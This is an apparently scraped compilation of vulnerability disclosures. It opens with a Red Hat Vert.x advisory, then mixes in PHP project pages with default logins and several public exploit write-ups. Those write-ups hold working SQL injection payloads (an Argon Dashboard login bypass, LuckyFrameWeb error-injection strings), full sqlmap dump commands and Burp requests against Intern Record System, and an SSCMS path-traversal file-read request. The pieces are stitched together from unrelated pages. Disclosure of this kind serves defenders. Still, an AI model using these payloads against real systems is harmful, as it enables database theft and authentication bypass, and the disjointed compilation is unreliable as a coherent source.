Red Hat Security Advisory 2023-0577-01 - This release of Red Hat build of Eclipse Vert.x 4.3.7 GA includes security updates. For more information, see the release notes listed in the References section. Issues addressed include a denial of service vulnerability.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256=====================================================================                   Red Hat Security AdvisorySynopsis:          Moderate: Red Hat build of Eclipse Vert.x 4.3.7 security updateAdvisory ID:       RHSA-2023:0577-01Product:           Red Hat OpenShift Application RuntimesAdvisory URL:      https://access.redhat.com/errata/RHSA-2023:0577Issue date:        2023-02-16CVE Names:         CVE-2022-41854 CVE-2022-41881 =====================================================================1. Summary:An update is now available for Red Hat build of Eclipse Vert.x.Red Hat Product Security has rated this update as having a security impactof Moderate. A Common Vulnerability Scoring System (CVSS) base score, whichgives a detailed severity rating, is available for each vulnerability. Formore information, see the CVE pages listed in the References section.2. Description:This release of Red Hat build of Eclipse Vert.x 4.3.7 GA includes securityupdates. For more information, see the release notes listed in theReferences section.Security Fix(es):* codec-haproxy: HAProxyMessageDecoder Stack Exhaustion DoS(CVE-2022-41881)* dev-java-snakeyaml: dev-java/snakeyaml: DoS via stack overflow(CVE-2022-41854)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgements, and other related information, refer to the CVEpage(s) listed in the References section.3. Solution:Before applying the update, back up your existing installation, includingall applications, configuration files, databases and database settings, andso on.The References section of this erratum contains a download link for theupdate. You must be logged in to download the update.4. Bugs fixed (https://bugzilla.redhat.com/):2151988 - CVE-2022-41854 dev-java/snakeyaml: DoS via stack overflow2153379 - CVE-2022-41881 codec-haproxy: HAProxyMessageDecoder Stack Exhaustion DoS5. References:https://access.redhat.com/security/cve/CVE-2022-41854https://access.redhat.com/security/cve/CVE-2022-41881https://access.redhat.com/security/updates/classification/#moderatehttps://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=distributions&product=catRhoar.eclipse.vertx&version=4.3.7https://access.redhat.com/documentation/en-us/red_hat_build_of_eclipse_vert.x/4.3/html/release_notes_for_eclipse_vert.x_4.3/index6. Contact:The Red Hat security contact is <secalert@redhat.com>. More contactdetails at https://access.redhat.com/security/team/contact/Copyright 2023 Red Hat, Inc.-----BEGIN PGP SIGNATURE-----Version: GnuPG v1iQIVAwUBY+514NzjgjWX9erEAQiXsA//R2iUqv8p0cLhsqlXZhX8fnWgGyHT5YI/ECvfslAn+5JB/HaeZNYQpovrHadLuWU1ZWjWunbd7ioaknY/SnQXww+L+FFFVfFOa57J1okP7N8/aDzXCJmQ64lDr65j5kUwv8UPyryOe0GZH0SU9WErRAULf+Q/48wAQVl6C2rEBlhy195kH1waCuCls0BD7x3IcrmrpbCFfiIQtDcpW7SRlk691vVamzRlCHj/aWr2WWpBEG10ic6NOUjSlosfZqvMJ4deIaU+xPc+ovAwiVzoxoT7YB7wE4+N61pwpABTP2sxI2wDHtbS5C0LkEDWtvTvaVEd8CT9SYNhOI4EcN5waHzXFzRxZ4LOu92q7niL/Ao5jjHqHMbFdWfClXandpBiV54EtQuht1IHwYm/jHLDFQKoIbuO0CAjY4q6gLG/+N63gEBy5Wlpikuqy5vWW+ftCD4r32cix/dOP342NBRwhT+dZ5e3+iWXUDziXhv8a8Z4PxJOPeD7liSER8yhBU/6mxrljBBUVg7/hQCbq+2OQ33vvIaalma18MI9Oej13h/iNxYC2244Sp3EupImmwUjXOiUHyElz5QjhXe/u7qB9QQ/sDky8BL2B/3F8EnPKOUjQt+/xqCPdHXINJsLYBAGXHx/Iz6jVxg3ERFHyPW5EXR6yboIp0vAfebL5QRld3U==iFMn-----END PGP SIGNATURE-------RHSA-announce mailing listRHSA-announce@redhat.comhttps://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0577-01

Argon Dashboard version 1.1.2 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : Argon Dashboard - v1.1.2 Auth By Pass Vulnerability                                                                || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 109.0(64-bit)                                              | | # Vendor    : https://www.creative-tim.com/product/argon-dashboard#                                                              |  | # Dork      :                                                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : user : 'or''='@gmail.com1 & Pass : 'or''='[+] https://127.0.0.1/aadarshinstrumentscom/admin/examples/inquiry.phpGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |                                                                                                                                              |=======================================================================================================================================

Argon Dashboard 1.1.2 SQL Injection

SQL Injection vulnerability in Projectworlds Online Doctor Appointment Booking System, allows attackers to gain sensitive information via the q parameter to the getuser.php endpoint.

****Subscribe YouTube** For Latest Update **Click Here********100 + PHP Projects with Source Code** **

The Online Doctor Appointment Booking System PHP and Mysql is a simple project developed using PHP, JavaScript, and CSS. The project contains an admin and user sides. The admin side manages all the management like managing schedules, patient records and manage the appointment time, manage treatment facilities, and so on. The admin has an important role in the management of this Online Doctor Appointment Booking System PHP and Mysql.

This Project Like Doctor manage Personal Clinic Appointment ....small project

**Brief overview of the technology:**

Front end: HTML, CSS, JavaScript

1.  HTML: HTML is used to create and save web document. E.g. Notepad/Notepad++
2.  CSS : (Cascading Style Sheets) Create attractive Layout
3.  Bootstrap : responsive design mobile freindly site
4.  JavaScript: it is a programming language, commonly use with web browsers.

Back end: PHP, MySQL

1.  PHP: Hypertext Preprocessor (PHP) is a technology that allows software developers to create dynamically generated web pages, in HTML, XML, or other document types, as per client request. PHP is open source software.
2.  MySQL: MySql is a database, widely used for accessing querying, updating, and managing data in databases.

**Software Requirement(any one)**

*   WAMP Server
*   XAMPP Server
*   MAMP Server
*   LAMP Server

**Installation Steps**

1\. Download zip file and Unzip file on your local server.  
2\. Put this file inside "c:/xamp/htdocs/" .  
3\. Database Configuration  
Open phpmyadmin  
Create Database named db\_healthcare.  
Import database db\_healthcare.sql from downloaded folder(inside database)  
4\. Open Your browser put inside "http://localhost/PHP-Doctor-Appointment-System/"

**Admin Login Details**  
Login Id: 123  
Password: 123

****Download link****

CVE-2020-29168: Online Doctor Appointment Booking System PHP and Mysql | Projectworlds

SQL Injection vulnerability in Simple Task Managing System version 1.0 in login.php in 'username' and 'password' parameters, allows attackers to execute arbitrary code and gain sensitive information.

Submitted by razormist on Friday, August 26, 2022 - 22:47.

**Simple Task Managing System in PHP With MySQLi Free Source Code******Introduction****

The **Simple Task Managing System in PHP With MySQLi** is a simple web system coded in a **PHP** programming language. This project contains an advance coding script that display fully operational function of the system. The system contain many functionalities that use its purpose. This **Simple Task Managing System** is a project that can help students taking IT related courses. This is a simple system that tends to help beginners to start their php programming career . This **Simple Task Managing System in PHP With MySQLi** provide a learning references to help beginners learn to use **PHP** programming.

The **Simple Task Managing System in PHP With MySQLi Free Source Code** is free to be downloaded just read the content below for more info. This application is for **educational purpose only**.

****Simple Task Managing System in PHP With MySQLi Free Source Code** Basic Information**

*   **Language used:** PHP
*   **Front-end used:** HTML & CSS
*   **Coding Tool used:** Notepad++ or any text editor that can run php files
*   **Type:** Web Application
*   **Database used:** MySQLi

****About Simple Task Managing System in PHP With MySQLi****

The **Simple Task Managing System in PHP With MySQLi** was developed using **PHP** programming language. This is a user-friendly kind of application that can be easily modified to be used in your on working projects. The system contains a function that can allow user to create project title. The application is strictly protected by a user login information, you need to enter a correct username and password to fully access the feature of the system. The user can do many things in the system he/she can add new project, add task list, search projects. You can create your on project by going in the add project and enter the required field. Each project has a task list you can assign a task and change its status base on your project progression. This project tends to educate you on how to create a simple php system in a basic way.

****Simple Task Managing System in PHP With MySQLi Free Source Code** Features**

*   **Display the Overall Project**
*   **Can add new Project**
*   **Each Project has a Task**
*   **You can assign you task**
*   **Display total task for each project**

****Sample System Screenshot**:**

****Login Page****

****Add Project Page****

****Project List Page****

****Add Task Page****

****Task List Page****

****Simple Task Managing System in PHP With MySQLi Free Source Code** Installation Guide**

1.  **Download** and **Install** any **local web server** such as **XAMPP, WAMP, etc.**
2.  **Download** the source code in this site
3.  **Open** your **XAMPP Control Panel** and start **Apache** and **MySQL**.
4.  **Extract** the **downloaded source code **zip** file**.
5.  **Copy** the extracted source code folder and **paste** it into the **XAMPP's "htdocs" directory**.
6.  **Browse** the **PHPMyAdmin** in a **browser**.
7.  **Create** a **new database** name it **tasker**.
8.  **Import** the attached **SQL**file. The file name is **tasker.sql** located inside the database folder.
9.  **Browse** the **Task Management System** in a **browser**. **http://localhost/Task%20Managing%20System%20in%20PHP/**.

**User Login Information**

**Username:** admin

**Password:** admin

That's all, The **Simple Task Managing System in PHP With MySQLi** was created fully functional using **PHP** language. I hope that this project can help you to what you are looking for. For more **projects and tutorials** please kindly visit this site. Enjoy Coding!

The **Simple Task Managing System in PHP With MySQLi Free Source Code** is ready to be downloaded just kindly click the download button below.

**Related Projects & Tutorials**

Simple Task Managing System in PHP With MySQLi

*   4256 views

CVE-2022-40032: Simple Task Managing System in PHP With MySQLi Free Source Code

SQL Injection vulnerability in Intern Record System version 1.0 in /intern/controller.php in 'phone', 'email', 'deptType' and 'name' parameters, allows attackers to execute arbitrary code and gain sensitive information.

**CVE-2022-40347\_Intern-Record-System-V1.0-SQL-Injection-Vulnerability-Unauthenticated**

CVE-2022-40347: Intern Record System - 'phone', 'email', 'deptType' and 'name' SQL Injection (Unauthenticated)

Exploit Title: Intern Record System - 'phone', 'email', 'deptType' and 'name' SQL Injection (Unauthenticated)

Date: 2022-06-09

Exploit Author: Hamdi Sevben

Vendor Homepage: https://code-projects.org/intern-record-system-in-php-with-source-code/

Software Link: https://download-media.code-projects.org/2020/03/Intern\_Record\_System\_In\_PHP\_With\_Source\_Code.zip

Version: 1.0

Tested on: Windows 10 Pro + PHP 8.1.6, Apache 2.4.53

CVE: CVE-2022-40347

References:

https://code-projects.org/intern-record-system-in-php-with-source-code/

https://download-media.code-projects.org/2020/03/Intern\_Record\_System\_In\_PHP\_With\_Source\_Code.zip

1.  Description:

Intern Record System 1.0 allows SQL Injection via parameters 'phone', 'email', 'deptType' and 'name' in /intern/controller.php Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latest vulnerabilities in the underlying database.

2.  Proof of Concept:

In sqlmap use 'phone', 'email', 'deptType' or 'name' parameter to dump 'department' database.

Then run SQLmap to extract the data from the database:

sqlmap.py -u "http://localhost/intern/controller.php" -p "deptType" --risk="3" --level="3" --method="POST" --data="phone=&email=&deptType=test&name=" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36" --headers="Host:localhost\\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,_/_;q=0.8\\nAccept-Encoding:gzip, deflate\\nAccept-Language:en-us,en;q=0.5\\nCache-Control:no-cache\\nContent-Type:application/x-www-form-urlencoded\\nReferer:http://localhost/intern/" --dbms="MySQL" --batch --dbs -D department --dump

sqlmap.py -u "http://localhost/intern/controller.php" -p "email" --risk="3" --level="3" --method="POST" --data="phone=&email=test&deptType=3&name=" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36" --headers="Host:localhost\\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,_/_;q=0.8\\nAccept-Encoding:gzip, deflate\\nAccept-Language:en-us,en;q=0.5\\nCache-Control:no-cache\\nContent-Type:application/x-www-form-urlencoded\\nReferer:http://localhost/intern/" --dbms="MySQL" --batch --dbs -D department --dump

sqlmap.py -u "http://localhost/intern/controller.php" -p "name" --risk="3" --level="3" --method="POST" --data="phone=&email=&deptType=3&name=test" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36" --headers="Host:localhost\\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,_/_;q=0.8\\nAccept-Encoding:gzip, deflate\\nAccept-Language:en-us,en;q=0.5\\nCache-Control:no-cache\\nContent-Type:application/x-www-form-urlencoded\\nReferer:http://localhost/intern/" --dbms="MySQL" --batch --dbs -D department --dump

sqlmap.py -u "http://localhost/intern/controller.php" -p "phone" --risk="3" --level="3" --method="POST" --data="phone=test&email=&deptType=3&name=" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36" --headers="Host:localhost\\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,_/_;q=0.8\\nAccept-Encoding:gzip, deflate\\nAccept-Language:en-us,en;q=0.5\\nCache-Control:no-cache\\nContent-Type:application/x-www-form-urlencoded\\nReferer:http://localhost/intern/" --dbms="MySQL" --batch --dbs -D department --dump

3.  Example payload:

\-1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(\*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)\*2))x+FROM+INFORMATION\_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27

4.  Burpsuite request on 'phone' parameter:

POST /intern/controller.php HTTP/1.1

Host: localhost

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,_/_;q=0.8

Accept-Encoding: gzip, deflate

Accept-Language: en-us,en;q=0.5

Cache-Control: no-cache

Content-Length: 317

Content-Type: application/x-www-form-urlencoded

Referer: http://localhost/intern/

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36

phone=-1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(\*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)\*2))x+FROM+INFORMATION\_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27&email=&deptType=3&name=

5.  Burpsuite request on 'email' parameter:

POST /intern/controller.php HTTP/1.1

Host: localhost

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,_/_;q=0.8

Accept-Encoding: gzip, deflate

Accept-Language: en-us,en;q=0.5

Cache-Control: no-cache

Content-Length: 317

Content-Type: application/x-www-form-urlencoded

Referer: http://localhost/intern/

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36

phone=&email=-1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(\*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)\*2))x+FROM+INFORMATION\_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27&deptType=3&name=

6.  Burpsuite request on 'deptType' parameter:

POST /intern/controller.php HTTP/1.1

Host: localhost

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,_/_;q=0.8

Accept-Encoding: gzip, deflate

Accept-Language: en-us,en;q=0.5

Cache-Control: no-cache

Content-Length: 316

Content-Type: application/x-www-form-urlencoded

Referer: http://localhost/intern/

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36

phone=&email=&deptType=-1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(\*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)\*2))x+FROM+INFORMATION\_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27&name=

7.  Burpsuite request on 'name' parameter:

POST /intern/controller.php HTTP/1.1

Host: localhost

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,_/_;q=0.8

Accept-Encoding: gzip, deflate

Accept-Language: en-us,en;q=0.5

Cache-Control: no-cache

Content-Length: 317

Content-Type: application/x-www-form-urlencoded

Referer: http://localhost/intern/

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36

phone=&email=&deptType=3&name=-1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(\*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)\*2))x+FROM+INFORMATION\_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27

CVE-2022-40347: GitHub - h4md153v63n/CVE-2022-40347_Intern-Record-System-phone-V1.0-SQL-Injection-Vulnerability-Unauthenticated: CVE-2022-40347: Intern Record System - 'phone', 'email', 'deptType' and 'name' SQL Inje

A vulnerability has been found in SourceCodester Online Pizza Ordering System 1.0 and classified as critical. This vulnerability affects unknown code of the file /php-opos/index.php. The manipulation of the argument ID leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-221350 is the identifier assigned to this vulnerability.

CVE-2023-0883

LuckyframeWEB v3.5 was discovered to contain a SQL injection vulnerability via the dataScope parameter at /system/RoleMapper.xml.

src/main/resources/mybatis/system/RoleMapper.xml

There is a ${} in this mapper

<if test\="deptId != null and deptId != 0"\>
			AND (u.dept\_id = #{deptId} OR u.dept\_id IN ( SELECT t.dept\_id FROM sys\_dept t WHERE FIND\_IN\_SET (#{deptId},ancestors) ))
		</if\>
		
		${params.dataScope}
	</select\>
	

Search selectUserList to see where the this select id is used：

Query user information：  
src/main/java/com/luckyframe/project/system/role/controller/RoleController.java

Follow up the selectUserList method to see the specific implementation：

src/main/java/com/luckyframe/project/system/role/service/RoleServiceImpl.java

The parameters in the User are passed into the mapper for SQL operation. Because the datascope is controllable, the vulnerability is generated

Verification:

Splice URL and parameters according to code:

Use error injection to query the database version：

params\[dataScope\]=and+extractvalue(1,concat(0x7e,substring((select+version()),1,32),0x7e))

Select database name:

CVE-2023-24220: sql inject 1  · Issue #22 · seagull1985/LuckyFrameWeb

LuckyframeWEB v3.5 was discovered to contain a SQL injection vulnerability via the dataScope parameter at /system/DeptMapper.xml.

src/main/resources/mybatis/system/DeptMapper.xml

There is a ${} in this mapper  
  
Search selectDeptList to see where the this select id is used:  
  
/DeptController.java

Query dept information：  
  
Follow up the selectDeptList method to see the specific implementation：

/DeptServiceImpl.java

  
The parameters in the Dept are passed into the mapper for SQL operation. Because the datascope is controllable, the vulnerability is generated  

Verification:

Splice URL and parameters according to code:

Use error injection to query the database version：

params\[dataScope\]=and+extractvalue(1,concat(0x7e,substring((select+version()),1,32),0x7e))

  
Select database name:

CVE-2023-24221: sql inject 2 · Issue #23 · seagull1985/LuckyFrameWeb

LuckyframeWEB v3.5 was discovered to contain a SQL injection vulnerability via the dataScope parameter at /system/UserMapper.xml.

src/main/resources/mybatis/system/UserMapper.xml

There is a ${} in this mapper  
  
Search selectUserList to see where the this select id is used：  
  
UserController.java

Query user information：  
  
Follow up the selectUserList method to see the specific implementation：

UserServiceImpl.java  
  
The parameters in the User are passed into the mapper for SQL operation. Because the datascope is controllable, the vulnerability is generated

Verification:

Splice URL and parameters according to code:

Use error injection to query the database version：

params\[dataScope\]=and+extractvalue(1,concat(0x7e,substring((select+version()),1,32),0x7e))

Select database name:

CVE-2023-24219: sql inject 3 · Issue #24 · seagull1985/LuckyFrameWeb

SiteServerCMS 7.1.3 sscms has a file read vulnerability.

Vulnerability conditions  
SSCMS v7.1.3 +mysql+administrator privileges  
Vulnerability details

1.  Code analysis found /api/admin/cms/templates/templatesAssetsEditor?directoryPath=&fileName=  
    An arbitrary file read vulnerability exists in the interface  
    code analysis process  
    \\SSCMS.Web\\Controllers\\Admin\\Cms\\Templates\\TemplatesAssetsEditorController.Get.cs  
    Enter and find that the FileName parameter is controllable and there is no filtering to pass into the ReadTextAsync method

The entry method discovery is to read out the cultural content, resulting in a file read vulnerability.  

Vulnerability verification  
An exp packet occurs after logging in to the background to obtain administrator credentials  
GET /api/admin/cms/templates/templatesAssetsEditor?directoryPath=&fileName=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini&fileType=html&siteId=1 HTTP/1.1 Host: 192.168.3.129 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: application/json, text/plain, */* Accept-Language: zh-CN,zh;q=0.9 Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1laWQiOiIxIiwibmFtZSI6ImFkbWluIiwicm9sZSI6IkFkbWluaXN0cmF0b3IiLCJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dzLzIwMDgvMDYvaWRlbnRpdHkvY2xhaW1zL2lzcGVyc2lzdGVudCI6IkZhbHNlIiwibmJmIjoxNjY2MDY1NDYwLCJleHAiOjE2NjYxNTE4NjAsImlhdCI6MTY2NjA2NTQ2MH0.C_5BVy0Tlv-s9n8Nq2zgummkzvn50prSoOefuRVhBR8 Cookie: .AspNetCore.Antiforgery.63-E5AgGJCk=CfDJ8M6RIMVIA85OqO7ajAvAmn0W_d4giFi-UZleDB9SmjuNjqZshLg6aw57gScnZlpH6U67ohL01F-C9bjGigmapHHvA5s3qiVH_pJSxx6-DoVIkm0H9mRiZ7vnlUqgrXXLDHrtcZvMrPva6Cv41qAIV-I Referer: http://192.168.3.129/ss-admin/cms/templatesAssetsEditor/?siteId=1&directoryPath=&fileName=&fileType=html&tabName=dd25719b-c34e-40df-883f-6a991a23d826 Accept-Encoding: gzip

Tag

#sql